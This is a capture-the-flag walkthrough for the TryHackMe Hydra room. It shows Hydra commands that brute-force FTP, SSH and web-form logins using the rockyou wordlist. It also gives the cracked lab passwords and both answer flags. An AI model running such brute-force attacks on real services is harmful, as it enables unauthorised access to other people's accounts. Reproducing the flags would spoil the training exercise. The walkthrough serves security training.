Hydra (TryHackMe Walkthrough)

What is Hydra?

Hydra is a pre-installed tool in kali Linux. It is used to brute force an online password. We can use Hydra to run through a list and ‘brute-force some authentication service.

Hydra has the ability to brute-force the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Hydra Commands

The options we pass into Hydra depend on which service (protocol) we’re attacking. For example, if we wanted to brute-force FTP with the username being user and a password list being passlist.txt, we’d use the following command:

hydra -l user_name -P password_list.txt ftp://IP of the machine

For the purpose of this deployed machine, here are the commands to use Hydra on SSH and a web form (POST method).

SSH

hydra -l <username> -P <full path to pass> IP -t 4 ssh

Post Web Form

We can use Hydra to brute force web forms too, you will have to make sure you know which type of request its making — GET or POST methods are normally used. You can use your browser's network tab (in developer tools) to see the request types, or simply view the source code. Below is an example Hydra command to brute force a POST login form:

hydra -l <username> -P <wordlist> Machine’s IP http-post-form “/:username=^USER^&password=^PASS^:F=incorrect” -V

Use Hydra to brute force molly’s web password. What is flag 1?

In the terminal, input :

hydra -l molly -P /usr/share/wordlists/rockyou.txt Machine’s IP http-post-form “/login:username=^USER^&password=^PASS^:incorrect”

It tries all the passwords from rockyou.txt and shows the correct password which in our case is

[80][http-post-form] host: Machine’s IP login: molly password: sunshine

so use this password to log into the webpage that is in the Machine’s IP.

username: molly

Password: sunshine

brute-forcing the password

after logging in with the found password

there is the flag : THM{2673a7dd116de68e85c48ec0b1f2612e}

Use Hydra to bruteforce molly’s SSH password. What is flag 2?

Here you need to bruteforce the SSH password. So, try bruteforcing ssh password with following command:

hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://Machine’s IP

Now here you will again get a valid password in highlighted text

username : molly

Password : butterfly

Now, think for a while and you will get to a point that the flag must be in the machine so you must login via SSH. so login to the machine using SSH:

ssh molly@Machine’s IP

now type “Yes” if it asks you whether you want to continue.

Enter the password, i.e: butterfly

Bruteforcing SSH

Now when you get logged in, try

ls

so there is a file flag2.txt

finding the flag

reading the flag

Now cat the file, i.e : cat flag2.txt

Ans : THM{c8eeb0468febbadea859baeb33b2541b}